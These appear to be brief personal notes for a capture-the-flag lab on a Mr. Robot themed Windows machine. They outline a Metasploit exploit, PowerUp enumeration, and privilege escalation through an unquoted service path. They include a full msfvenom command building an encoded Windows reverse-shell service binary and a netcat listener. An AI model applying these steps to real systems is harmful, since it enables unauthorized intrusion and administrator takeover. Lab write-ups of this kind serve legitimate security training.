Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
idk kev
- reverse image search image on page, or check page source
nmap -A <ip>
- opening webserver in browser
- checking cves on webserver and version
- use metasploit exploit, set rhosts and rport
- run
- move do desktop and get flag
- upload PowerUp to target
upload <path to file>
- load powershell
load powershell
- enter powershell
powershell_shell
- load PowerUp.ps1
Invoke-AllChecks
- check for restartable services with unquoted service path
- generate reverse shell using msfenvom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.48.224 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
- replace real service with generated one
- start netcat listener
- start and stop service
- Profit